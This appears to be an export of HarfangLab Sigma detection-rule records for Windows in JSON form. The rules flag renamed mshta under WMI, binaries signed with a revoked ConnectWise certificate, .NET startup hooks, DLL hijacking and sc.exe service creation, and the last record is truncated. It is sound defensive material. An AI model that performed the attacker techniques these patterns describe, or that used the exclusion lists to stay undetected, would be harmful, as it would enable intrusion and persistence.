"name": "t1047_group_ta551_wmi_renamed_mshta.yml",
"content": "title: Possible Lateral Movement via Renamed MSHTA through WMI\nid: 254f2253-5e75-41de-a4fb-bbfa86c1a831\ndescription: |\n Detects when a renamed mshta.exe binary is executed by WMI (child of wmiprvse).\n This technique is heavily used by the TA551 group actor when executing a malicious payload received by spear phishing campaigns.\n It is recommended to investigate the origin of this execution through the authentication telemetry and to analyze child processes to look for malicious content or actions.\nreferences:\n - https://unit42.paloaltonetworks.com/valak-evolution/\n - https://twitter.com/ForensicITGuy/status/1334734244120309760\n - https://app.any.run/tasks/6e90f38e-8b34-4e12-9a33-3bc5e3b4d81e/\ndate: 2020/12/08\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\wmiprvse.exe'\n OriginalFileName: 'MSHTA.EXE'\n\n filter_image:\n Image|endswith: '\\mshta.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "254f2253-5e75-41de-a4fb-bbfa86c1a831",
"rule_name": "Possible Lateral Movement via Renamed MSHTA through WMI",
"rule_description": "Detects when a renamed mshta.exe binary is executed by WMI (child of wmiprvse).\nThis technique is heavily used by the TA551 group actor when executing a malicious payload received by spear phishing campaigns.\nIt is recommended to investigate the origin of this execution through the authentication telemetry and to analyze child processes to look for malicious content or actions.\n",
"rule_creation_date": "2020-12-08",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2557816c-987b-4020-8958-02526e2e549b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096803Z",
"creation_date": "2026-03-23T11:45:34.096805Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096809Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.gdatasoftware.com/blog/2025/06/38218-connectwise-abuse-malware",
"https://x.com/smica83/status/1977489233712717894",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_connectwise_revoked_certificate.yml",
"content": "title: Process Executed Signed with Connectwise Revoked Certificate\nid: 2557816c-987b-4020-8958-02526e2e549b\ndescription: |\n Detects the execution of a process signed using the Connectwise revoked certificate.\n This certificate has been revoked because it was abused by threat actors to sign malicious ConnectWise binaries.\n Since March 2025, threat actors have been abusing validly signed ConnectWise binaries by embedding custom malicious content via Authenticode stuffing without breaking the signature.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://www.gdatasoftware.com/blog/2025/06/38218-connectwise-abuse-malware\n - https://x.com/smica83/status/1977489233712717894\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2025/10/13\nmodified: 2025/10/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '4c2272fba7a7380f55e2a424e9e624aee1c14579'\n\n # Using Connectwise revoked certificate but not malicious\n exclusion_image:\n ProcessImage:\n - '?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.ClientService.exe'\n - '?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsClient.exe'\n - '?:\\Program Files (x86)\\ScreenConnect\\Bin\\ScreenConnect.Service.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n - '?:\\Windows\\LTSvc\\LTTray.exe'\n - '?:\\Windows\\LTSvc\\LTSvcMon.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\\\????????.???\\\\????????.???\\\\*\\ScreenConnect.ClientService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\\\????????.???\\\\????????.???\\\\*\\ScreenConnect.WindowsClient.exe'\n - '?:\\Program Files (x86)\\SAAZOD\\\\*'\n - '?:\\Program Files (x86)\\ITSPlatform\\\\*'\n - '*\\STAGO\\Stago.Psad.Client\\ScreenConnect\\ScreenConnect.ClientService.exe'\n - '*\\STAGO\\Stago.Psad.Client\\ScreenConnect\\ScreenConnect.WindowsClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2557816c-987b-4020-8958-02526e2e549b",
"rule_name": "Process Executed Signed with Connectwise Revoked Certificate",
"rule_description": "Detects the execution of a process signed using the Connectwise revoked certificate.\nThis certificate has been revoked because it was abused by threat actors to sign malicious ConnectWise binaries.\nSince March 2025, threat actors have been abusing validly signed ConnectWise binaries by embedding custom malicious content via Authenticode stuffing without breaking the signature.\nIt is recommended to investigate the process to determine its legitimacy.\n",
"rule_creation_date": "2025-10-13",
"rule_modified_date": "2025-10-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2580b2f9-373b-4a4c-9b57-13e458627130",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098306Z",
"creation_date": "2026-03-23T11:45:34.098308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098312Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable",
"https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_sideloading_dotnet_startup_hook.yml",
"content": "title: Dotnet Startup Hook Environment Variable Set\nid: 2580b2f9-373b-4a4c-9b57-13e458627130\ndescription: |\n Detects the registration of a dotnet startup hook using the DOTNET_STARTUP_HOOKS environment variable.\n Adversaries can register a malicious assembly that will be executed whenever a .net core application is started.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable\n - https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Cmd.EXE'\n CommandLine|contains|all:\n - 'set '\n - 'DOTNET_STARTUP_HOOKS='\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2580b2f9-373b-4a4c-9b57-13e458627130",
"rule_name": "Dotnet Startup Hook Environment Variable Set",
"rule_description": "Detects the registration of a dotnet startup hook using the DOTNET_STARTUP_HOOKS environment variable.\nAdversaries can register a malicious assembly that will be executed whenever a .net core application is started.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "258b150d-0fe4-48e0-93bc-09d02567ecb8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592069Z",
"creation_date": "2026-03-23T11:45:34.592072Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592080Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoftedgesh.yml",
"content": "title: DLL Hijacking via microsoftedgesh.exe\nid: 258b150d-0fe4-48e0-93bc-09d02567ecb8\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgesh.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgesh.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "258b150d-0fe4-48e0-93bc-09d02567ecb8",
"rule_name": "DLL Hijacking via microsoftedgesh.exe",
"rule_description": "Detects potential Windows DLL Hijacking via microsoftedgesh.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "25bdc370-c782-4157-b467-3e74718d8b59",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074695Z",
"creation_date": "2026-03-23T11:45:34.074697Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074702Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/003/"
],
"name": "t1543_003_manual_service_creation_with_sc.yml",
"content": "title: Service Created via sc.exe\nid: 25bdc370-c782-4157-b467-3e74718d8b59\ndescription: |\n Detects the manual creation of a Windows service using sc.exe.\n While sc.exe is a legitimate Windows tool for managing services, its manual use outside of an installer can indicate adversaries may be creating a Windows service to achieve persistence.\n It is recommended to investigate suspicious service creation events through sc.exe, specially if they are not part of an installation process, and validate the service binary path and account privileges.\nreferences:\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2022/12/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1543.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sc\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ServiceCreation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n CommandLine|contains|all:\n - ' create'\n - 'binPath='\n\n exclusion_logisync:\n GrandparentImage:\n - '?:\\Program Files (x86)\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe'\n - '?:\\Program Files\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe'\n\n exclusion_intel:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\Intel\\'\n - '?:\\Program Files (x86)\\Intel\\'\n\n exclusion_installer:\n GrandparentImage:\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_listary:\n CommandLine|contains: ' ListaryService'\n\n exclusion_webcompanion:\n ParentImage|endswith: '\\WebCompanionInstaller.exe'\n\n exclusion_parsec:\n GrandparentImage|endswith: '\\parsec-windows.exe'\n\n exclusion_autodesk:\n GrandparentImage|endswith: '\\AdODIS-installer.exe'\n\n exclusion_dell:\n GrandparentImage|endswith: '\\invcol.exe'\n\n exclusion_hp:\n ParentImage:\n - '?:\\Program Files\\HP\\HP Touchpoint Analytics Client Installer\\TAInstaller.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client Installer\\TAInstaller.exe'\n - '?:\\Program Files\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n - '?:\\Program Files (x86)\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n\n exclusion_varian:\n CommandLine|contains: 'create VarianVDTRSDAgent binPath= *VMS.RemoteASD.VDTAgent.exe'\n ParentImage: '?:\\ProgramData\\VDT.exe'\n\n exclusion_asus_removetool:\n GrandparentImage: '?:\\Program Files\\ASUS\\ABM\\service\\RemoveTool.exe'\n\n exclusion_nable:\n ParentImage: '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n CommandLine|contains: 'sc.exe create AutomationManagerAgent start= auto displayName= Automation Manager Agent binPath= ??:\\Program Files (x86)\\N-Able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe?'\n\n exclusion_trendmicro:\n ParentImage: '?:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa.exe'\n CommandLine|contains: 'sc.exe create ds_nuagent start= disabled binpath= ??:\\Program Files\\Trend Micro\\Deep Security Agent\\nuagent\\ds_nuagent.exe?'\n\n exclusion_totalav:\n ParentImage: '?:\\Program Files (x86)\\TotalAV\\SecurityService.exe'\n CommandLine|contains: 'sc create ProtectedELAM binpath= ?:\\WINDOWS\\system32\\drivers\\protected_elam.sys'\n\n exclusion_mcafee:\n ParentImage:\n - '?:\\Program Files\\Common Files\\McAfee\\PEF\\Installer\\InstallPEF.exe'\n - '?:\\Program Files\\McAfee\\Temp??????????\\installer.exe'\n CommandLine|contains:\n - 'SC.exe create PEFService start= auto binpath= ??:\\Program Files\\Common Files\\McAfee\\PEF\\CORE\\PEFService.exe? DisplayName= McAfee PEF Service'\n - 'sc.exe create McAfee WebAdvisor binPath= ??:\\Program Files\\McAfee\\WebAdvisor\\ServiceHost.exe? start= auto DisplayName= McAfee WebAdvisor'\n\n exclusion_huawei:\n ParentImage:\n - '?:\\ProgramData\\Comms\\PCManager\\DriverUpgrade\\Update\\Downloaded\\\\*\\PCManager_Setup_*_x64.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\AccessoryCenter_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\BasicService_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\HiviewService_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\LCDEnhancement_step.exe'\n - '*\\MSPCManagerOffline.exe'\n CommandLine|contains:\n - 'sc.exe create HiConnectivityService DisplayName= Huawei Connectivity Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\HiConnectivityService.exe?'\n - 'sc.exe create HiviewService DisplayName= Huawei Hiview Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\Hiview\\HiviewService.exe?'\n - 'sc.exe create HwDistributedMainService DisplayName= Huawei Distributed Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\HwDistributedMainService.exe?'\n - 'sc.exe create HwPCCoreService DisplayName= Huawei PC Core Service start= auto binPath= ??:\\Program Files\\Huawei\\BasicService\\BasicService.exe?'\n - 'sc.exe create LCD_Service DisplayName= Huawei LCD_Service start= auto binPath= ??:\\Program Files\\Huawei\\HwLcdEnhancement\\LCD_Service.exe?'\n - 'sc.exe create MBAMainService DisplayName= Huawei PCManager Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\MateBookService.exe?'\n - 'sc.exe create PCManager Service start= auto binpath=?:\\Program Files\\Microsoft PC Manager\\MSPCManagerService.exe'\n\n exclusion_panda:\n GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\vnc_configure.cmd ?:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\winvnc.exe'\n - '?:\\Program Files (x86)\\Panda Cloud Systems Management\\CagService.exe'\n CommandLine:\n - 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\winvnc.exe? -service start= auto'\n - 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\Panda Systems Management\\UltraVNC\\winvnc.exe? -service start= auto'\n\n exclusion_centrastage:\n GrandparentImage: '?:\\Program Files (x86)\\CentraStage\\CagService.exe'\n CommandLine: 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\CentraStage\\UltraVNC\\winvnc.exe? -service start= auto'\n\n exclusion_alienware:\n GrandparentImage: '?:\\Program Files\\Alienware\\Alienware Command Center\\OCControlService\\OCControl.Service.exe'\n CommandLine: 'sc create AMDRyzenMasterDriverV?? binPath= ?:\\Program Files\\Alienware\\AMDRyzenMasterDriver\\bin\\AMDRyzenMasterDriver.sys type= kernel start= auto'\n\n exclusion_rustdesk:\n CommandLine: 'sc create RustDesk binpath= \"?:\\Program Files\\RustDesk\\RustDesk.exe\" * start= auto DisplayName= RustDesk Service'\n ParentCommandLine:\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\WINDOWS\\TEMP\\RustDesk_install.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Windows\\SystemTemp\\RustDesk_install.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Users\\\\*\\AppData\\Local\\Temp\\RustDesk_install.bat'\n\n exclusion_heat:\n CommandLine:\n - '?:\\Windows\\system32\\sc.exe create gzflt type= filesys displayname= gzflt start= demand binPath= ?:\\Windows\\system32\\drivers\\gzflt.sys depend= FltMgr group= FSFilter Anti-Virus tag= yes'\n - '?:\\Windows\\system32\\sc.exe create Trufos type= filesys displayname= Trufos start= demand binPath= ?:\\Windows\\system32\\drivers\\trufos.sys depend= FltMgr group= Boot Bus Extender tag= yes'\n GrandparentImage: '?:\\Program Files\\HEAT Software\\EMSSAgent\\\\??\\luarunner.exe'\n\n exclusion_mspecosystem:\n CommandLine:\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgentMaintenance start= auto DisplayName= Ecosystem Agent Maintenance binPath= ?:\\Program Files (x86)\\SolarWinds MSP\\Ecosystem Agent\\SolarWinds.MSP.Ecosystem.WindowsAgentMaint.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgent start= auto DisplayName= Ecosystem Agent binPath= ?:\\Program Files (x86)\\SolarWinds MSP\\Ecosystem Agent\\SolarWinds.MSP.Ecosystem.WindowsAgent.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgentMaintenance start= auto DisplayName= Ecosystem Agent Maintenance binPath= ?:\\Program Files (x86)\\N-able Technologies\\Ecosystem Agent\\Nable.Ecosystem.WindowsAgentMaint.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgent start= auto DisplayName= Ecosystem Agent binPath= ?:\\Program Files (x86)\\N-able Technologies\\Ecosystem Agent\\Nable.Ecosystem.WindowsAgent.exe'\n GrandparentImage: '?:\\ProgramData\\MSPEcosystem\\FileCache\\Upgrade\\Ecosystem.AgentSetup.exe'\n\n exclusion_admincenter:\n CommandLine|contains: 'binpath= ?:\\Program Files\\WindowsAdminCenter\\Service\\'\n ProcessGrandparentInternalName: 'Windows Admin Center (v2)'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n\n exclusion_matrix42:\n CommandLine|contains: 'binPath= \"?:\\Program Files\\Matrix42\\Maintenance Service\\Matrix42MaintenanceService.exe\"'\n ParentCommandLine|contains: 'Packages\\Matrix42\\UEM Agent Windows\\'\n\n exclusion_puppet_agent:\n ParentImage: '?:\\Program Files\\Puppet Labs\\\\*\\bin\\ruby.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "25bdc370-c782-4157-b467-3e74718d8b59",
"rule_name": "Service Created via sc.exe",
"rule_description": "Detects the manual creation of a Windows service using sc.exe.\nWhile sc.exe is a legitimate Windows tool for managing services, its manual use outside of an installer can indicate adversaries may be creating a Windows service to achieve persistence.\nIt is recommended to investigate suspicious service creation events through sc.exe, specially if they are not part of an installation process, and validate the service binary path and account privileges.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "25c7fcff-2700-4b0e-81d3-c467def3ef7e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095213Z",
"creation_date": "2026-03-23T11:45:34.095215Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095219Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiesremote.yml",
"content": "title: DLL Hijacking via systempropertiesremote.exe\nid: 25c7fcff-2700-4b0e-81d3-c467def3ef7e\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesremote.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesremote.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "25c7fcff-2700-4b0e-81d3-c467def3ef7e",
"rule_name": "DLL Hijacking via systempropertiesremote.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiesremote.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2650626f-6d1c-4193-b47e-4a0e51549c76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
